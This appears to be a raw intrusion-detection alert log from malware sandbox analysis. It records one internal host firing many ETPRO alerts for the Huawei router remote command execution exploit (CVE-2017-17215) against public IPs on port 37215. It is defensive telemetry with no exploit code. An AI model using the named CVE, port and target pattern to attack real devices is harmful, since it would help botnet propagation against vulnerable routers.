                                                        06/13/24-21:31:57.091563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074037215192.168.2.14197.241.131.120
                                                        06/13/24-21:33:09.102199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600437215192.168.2.14156.253.73.252
                                                        06/13/24-21:32:01.225114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005637215192.168.2.14197.91.160.210
                                                        06/13/24-21:32:23.931531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422437215192.168.2.14156.32.56.132
                                                        06/13/24-21:32:07.404102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186637215192.168.2.14156.118.220.157
                                                        06/13/24-21:33:09.085687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5423837215192.168.2.14197.230.43.190
                                                        06/13/24-21:32:36.246528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575037215192.168.2.1441.202.132.195
                                                        06/13/24-21:32:54.707785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229237215192.168.2.1441.51.76.222
                                                        06/13/24-21:33:09.085423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.14156.62.133.232
                                                        06/13/24-21:32:28.028887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5804237215192.168.2.14197.49.119.98
                                                        06/13/24-21:32:17.677224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.14197.58.145.40
                                                        06/13/24-21:32:30.094596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686237215192.168.2.14156.210.21.161
                                                        06/13/24-21:32:01.218348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488837215192.168.2.14156.162.190.12
                                                        06/13/24-21:32:21.805219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695037215192.168.2.14156.91.118.130
                                                        06/13/24-21:33:15.275934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988837215192.168.2.1441.119.146.166
                                                        06/13/24-21:32:03.294930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.1441.223.127.19
                                                        06/13/24-21:32:58.821566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339437215192.168.2.1441.54.179.120
                                                        06/13/24-21:32:28.026409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.1441.92.160.136
                                                        06/13/24-21:32:21.784162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655837215192.168.2.1441.21.15.163
                                                        06/13/24-21:32:52.670732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4256837215192.168.2.14197.212.34.58
                                                        06/13/24-21:32:07.402624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5242237215192.168.2.14197.13.39.169
                                                        06/13/24-21:33:09.085208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182437215192.168.2.14156.247.189.31
                                                        06/13/24-21:32:03.297480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764637215192.168.2.14156.32.187.77
                                                        06/13/24-21:32:07.416094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265437215192.168.2.14156.222.172.99
                                                        06/13/24-21:32:21.781805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501837215192.168.2.14156.132.25.192
                                                        06/13/24-21:32:28.026050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228037215192.168.2.14156.21.175.123
                                                        06/13/24-21:32:30.127272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821237215192.168.2.14156.184.181.237
                                                        06/13/24-21:33:07.042478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517637215192.168.2.14197.211.16.67
                                                        06/13/24-21:32:46.525735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181237215192.168.2.14156.127.65.133
                                                        06/13/24-21:32:42.408142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912037215192.168.2.1441.16.69.247
                                                        06/13/24-21:32:34.195300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048237215192.168.2.14197.231.64.16
                                                        06/13/24-21:33:09.129512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908237215192.168.2.14197.154.126.198
                                                        06/13/24-21:32:56.786520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485437215192.168.2.1441.17.189.175
                                                        06/13/24-21:33:17.340422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.1441.242.142.103
                                                        06/13/24-21:32:30.125181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824637215192.168.2.14156.28.3.71
                                                        06/13/24-21:33:07.042099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638637215192.168.2.14156.222.3.121
                                                        06/13/24-21:32:30.078503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933637215192.168.2.14156.58.158.137
                                                        06/13/24-21:32:17.676219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212637215192.168.2.1441.89.23.74
                                                        06/13/24-21:32:40.357748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405037215192.168.2.14197.81.4.196
                                                        06/13/24-21:32:13.566467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958637215192.168.2.14197.226.7.1
                                                        06/13/24-21:33:07.041382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292437215192.168.2.1441.131.110.42
                                                        06/13/24-21:33:15.254431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018437215192.168.2.14197.201.35.22
                                                        06/13/24-21:32:40.356749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322637215192.168.2.1441.103.20.177
                                                        06/13/24-21:33:00.885983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361237215192.168.2.1441.183.147.58
                                                        06/13/24-21:33:09.088106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341037215192.168.2.1441.255.132.255
                                                        06/13/24-21:33:15.253484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651837215192.168.2.1441.174.211.193
                                                        06/13/24-21:33:15.252684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183437215192.168.2.1441.224.56.22
                                                        06/13/24-21:33:02.949848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446637215192.168.2.1441.8.126.193
                                                        06/13/24-21:31:57.130859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267437215192.168.2.14156.211.164.49
                                                        06/13/24-21:32:11.487323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907637215192.168.2.1441.142.252.62
                                                        06/13/24-21:32:13.568640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584037215192.168.2.14156.80.60.194
                                                        06/13/24-21:32:30.097149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419837215192.168.2.1441.81.97.154
                                                        06/13/24-21:33:07.059964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451837215192.168.2.1441.53.83.55
                                                        06/13/24-21:31:59.177275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.14156.88.172.221
                                                        06/13/24-21:32:17.678730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709837215192.168.2.1441.163.70.151
                                                        06/13/24-21:32:52.658382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593237215192.168.2.1441.58.161.111
                                                        06/13/24-21:32:54.708052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597837215192.168.2.14156.41.140.228
                                                        06/13/24-21:32:54.724509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877237215192.168.2.1441.121.205.13
                                                        06/13/24-21:32:11.508073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815037215192.168.2.1441.0.28.215
                                                        06/13/24-21:32:30.073457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834237215192.168.2.1441.232.145.228
                                                        06/13/24-21:31:59.177374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021637215192.168.2.14156.112.130.200
                                                        06/13/24-21:32:36.246747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373237215192.168.2.1441.185.5.133
                                                        06/13/24-21:32:40.356001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.1441.26.209.182
                                                        06/13/24-21:31:59.197474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398837215192.168.2.14156.141.134.112
                                                        06/13/24-21:32:46.525452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762837215192.168.2.14197.89.81.27
                                                        06/13/24-21:32:13.566822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109637215192.168.2.1441.58.133.186
                                                        06/13/24-21:33:17.309676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075637215192.168.2.1441.224.237.46
                                                        06/13/24-21:32:52.671676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190637215192.168.2.14197.135.16.213
                                                        06/13/24-21:32:17.697263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.14156.136.252.148
                                                        06/13/24-21:32:09.439336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931637215192.168.2.14156.164.171.191
                                                        06/13/24-21:32:40.355202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023237215192.168.2.14197.180.16.249
                                                        06/13/24-21:32:25.976078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921237215192.168.2.14156.8.0.47
                                                        06/13/24-21:32:50.609703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015237215192.168.2.1441.253.215.42
                                                        06/13/24-21:32:32.153353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.14156.203.221.225
                                                        06/13/24-21:32:11.506417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815837215192.168.2.14156.254.8.118
                                                        06/13/24-21:32:42.420847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136037215192.168.2.14156.36.154.196
                                                        06/13/24-21:32:40.358509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577237215192.168.2.14156.232.208.214
                                                        06/13/24-21:32:15.608639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345637215192.168.2.14197.151.15.122
                                                        06/13/24-21:32:05.347284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230437215192.168.2.14197.242.173.51
                                                        06/13/24-21:33:02.953920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.14156.222.200.220
                                                        06/13/24-21:32:36.243960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4692637215192.168.2.1441.0.39.185
                                                        06/13/24-21:32:40.353596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172037215192.168.2.1441.69.182.100
                                                        06/13/24-21:32:23.835282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.1441.28.109.23
                                                        06/13/24-21:32:46.527617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033437215192.168.2.14197.186.139.151
                                                        06/13/24-21:32:13.545985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876837215192.168.2.14197.122.237.157
                                                        06/13/24-21:32:38.320941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808637215192.168.2.14197.67.232.95
                                                        06/13/24-21:32:48.570188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150837215192.168.2.14156.168.102.200
                                                        06/13/24-21:33:09.085159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.14197.214.1.6
                                                        06/13/24-21:33:11.176825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083837215192.168.2.14156.169.46.232
                                                        06/13/24-21:32:03.278363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578037215192.168.2.14156.52.1.101
                                                        06/13/24-21:32:58.824041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120237215192.168.2.14156.229.166.239
                                                        06/13/24-21:33:11.157314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370237215192.168.2.14156.95.246.149
                                                        06/13/24-21:32:44.458062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870037215192.168.2.14197.63.128.64
                                                        06/13/24-21:32:50.617374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186237215192.168.2.1441.173.255.241
                                                        06/13/24-21:33:02.953780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400037215192.168.2.14197.29.194.142
                                                        06/13/24-21:32:42.408281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804037215192.168.2.1441.254.182.101
                                                        06/13/24-21:32:40.356655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896637215192.168.2.14197.137.255.197
                                                        06/13/24-21:33:17.308669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800437215192.168.2.14156.186.103.127
                                                        06/13/24-21:32:25.997026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872837215192.168.2.14156.173.83.124
                                                        06/13/24-21:32:54.711479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728637215192.168.2.14156.134.140.15
                                                        06/13/24-21:33:17.310142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.14197.49.212.19
                                                        06/13/24-21:32:03.297133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486037215192.168.2.1441.96.239.161
                                                        06/13/24-21:32:56.756907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681237215192.168.2.14197.112.97.145
                                                        06/13/24-21:32:48.554450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121637215192.168.2.14156.223.10.150
                                                        06/13/24-21:32:48.552406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559837215192.168.2.14197.91.103.136
                                                        06/13/24-21:33:15.275555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954237215192.168.2.14156.222.16.0
                                                        06/13/24-21:32:11.487381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620037215192.168.2.14197.203.246.176
                                                        06/13/24-21:32:03.300862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850637215192.168.2.14197.242.43.85
                                                        06/13/24-21:32:44.477174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087437215192.168.2.1441.166.57.153
                                                        06/13/24-21:32:03.299320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559637215192.168.2.14197.175.74.47
                                                        06/13/24-21:32:13.566731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315837215192.168.2.14197.103.253.74
                                                        06/13/24-21:32:56.790705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345637215192.168.2.1441.189.132.255
                                                        06/13/24-21:33:13.231374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379437215192.168.2.14197.54.209.129
                                                        06/13/24-21:32:38.303747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413037215192.168.2.1441.250.119.214
                                                        06/13/24-21:31:59.173724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430237215192.168.2.1441.37.97.58
                                                        06/13/24-21:33:05.012882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246437215192.168.2.1441.66.3.159
                                                        06/13/24-21:32:48.555256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910437215192.168.2.14197.111.81.182
                                                        06/13/24-21:32:15.635770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953637215192.168.2.14156.95.188.228
                                                        06/13/24-21:33:00.869670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975637215192.168.2.1441.29.82.94
                                                        06/13/24-21:32:13.544981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14197.147.57.213
                                                        06/13/24-21:32:13.567591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104437215192.168.2.1441.49.50.27
                                                        06/13/24-21:32:42.419039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131237215192.168.2.1441.73.240.42
                                                        06/13/24-21:33:02.913005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127037215192.168.2.14197.34.241.158
                                                        06/13/24-21:33:07.042356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935637215192.168.2.1441.141.243.113
                                                        06/13/24-21:32:23.940354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985237215192.168.2.14197.76.146.84
                                                        06/13/24-21:32:52.678591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455237215192.168.2.14197.4.200.211
                                                        06/13/24-21:32:03.278401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000037215192.168.2.14197.146.168.47
                                                        06/13/24-21:32:07.418018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381437215192.168.2.14197.91.179.222
                                                        06/13/24-21:32:52.669156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010237215192.168.2.14156.142.134.92
                                                        06/13/24-21:32:40.374801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854237215192.168.2.14156.221.200.81
                                                        06/13/24-21:32:03.276438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434637215192.168.2.14197.185.19.212
                                                        06/13/24-21:32:17.670711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411437215192.168.2.14197.59.172.159
                                                        06/13/24-21:32:54.726910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063437215192.168.2.14156.240.200.80
                                                        06/13/24-21:32:28.027233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659037215192.168.2.1441.29.89.95
                                                        06/13/24-21:32:09.438887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360637215192.168.2.14197.178.224.197
                                                        06/13/24-21:33:15.276017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602237215192.168.2.1441.88.68.94
                                                        06/13/24-21:32:36.265163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409837215192.168.2.14197.126.195.126
                                                        06/13/24-21:31:57.131976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607637215192.168.2.14197.232.125.213
                                                        06/13/24-21:33:05.012689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768837215192.168.2.14156.5.55.193
                                                        06/13/24-21:32:11.484738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733037215192.168.2.14197.76.189.102
                                                        06/13/24-21:31:59.174908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813037215192.168.2.14197.8.72.118
                                                        06/13/24-21:32:01.246902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709237215192.168.2.14156.154.180.13
                                                        06/13/24-21:32:36.243913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4329837215192.168.2.14197.214.138.118
                                                        06/13/24-21:32:46.528153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689837215192.168.2.14156.112.139.21
                                                        06/13/24-21:33:13.210230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14156.35.235.5
                                                        06/13/24-21:32:34.194871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904037215192.168.2.14197.203.240.122
                                                        06/13/24-21:32:03.309543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855837215192.168.2.14156.210.227.73
                                                        06/13/24-21:32:30.078150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921437215192.168.2.14156.164.241.108
                                                        06/13/24-21:32:34.212901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817637215192.168.2.1441.74.208.178
                                                        06/13/24-21:33:07.061042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829837215192.168.2.14197.101.182.27
                                                        06/13/24-21:32:30.074942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869237215192.168.2.1441.48.80.253
                                                        06/13/24-21:32:50.631090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617037215192.168.2.14197.173.217.70
                                                        06/13/24-21:32:56.758360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674837215192.168.2.14156.3.8.53
                                                        06/13/24-21:33:09.091518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921037215192.168.2.14156.80.119.199
                                                        06/13/24-21:32:01.248651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852437215192.168.2.14197.45.206.41
                                                        06/13/24-21:33:11.158159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588637215192.168.2.14156.71.144.184
                                                        06/13/24-21:32:25.974717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267437215192.168.2.14197.8.83.23
                                                        06/13/24-21:32:58.841649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965237215192.168.2.14156.18.151.251
                                                        06/13/24-21:32:11.488574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14156.217.211.68
                                                        06/13/24-21:32:03.276190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940637215192.168.2.14197.17.79.167
                                                        06/13/24-21:33:00.868587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788037215192.168.2.14197.242.85.218
                                                        06/13/24-21:33:09.087792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118437215192.168.2.1441.117.30.120
                                                        06/13/24-21:32:13.564455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421837215192.168.2.1441.124.94.198
                                                        06/13/24-21:32:21.787264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630837215192.168.2.1441.200.99.235
                                                        06/13/24-21:32:05.369067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772637215192.168.2.14156.251.4.38
                                                        06/13/24-21:32:19.730743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3281837215192.168.2.14156.248.16.232
                                                        06/13/24-21:32:58.823235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4179837215192.168.2.14156.162.1.73
                                                        06/13/24-21:32:21.800293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14156.72.124.52
                                                        06/13/24-21:33:09.108814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438037215192.168.2.14197.129.157.43
                                                        06/13/24-21:33:02.914690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373037215192.168.2.14197.219.204.1
                                                        06/13/24-21:32:05.349450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078037215192.168.2.1441.168.205.37
                                                        06/13/24-21:32:56.791647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677037215192.168.2.14197.197.184.25
                                                        06/13/24-21:33:11.158739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136037215192.168.2.14156.230.109.34
                                                        06/13/24-21:31:57.153899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394437215192.168.2.14197.187.119.218
                                                        06/13/24-21:32:40.373346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450837215192.168.2.1441.43.184.211
                                                        06/13/24-21:32:34.213192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613437215192.168.2.14197.176.151.194
                                                        06/13/24-21:32:30.097254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063637215192.168.2.1441.46.178.72
                                                        06/13/24-21:32:56.753443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842237215192.168.2.14156.80.131.215
                                                        06/13/24-21:33:07.042707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035037215192.168.2.14197.21.219.149
                                                        06/13/24-21:32:03.299440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503437215192.168.2.1441.183.64.86
                                                        06/13/24-21:32:17.678387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670437215192.168.2.14197.72.1.69
                                                        06/13/24-21:32:32.166466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.1441.110.209.4
                                                        06/13/24-21:32:50.612356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110037215192.168.2.14156.183.134.248
                                                        06/13/24-21:32:05.345365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608037215192.168.2.14156.2.196.254
                                                        06/13/24-21:32:23.937479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042037215192.168.2.1441.133.67.205
                                                        06/13/24-21:32:50.630984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828037215192.168.2.14197.39.29.99
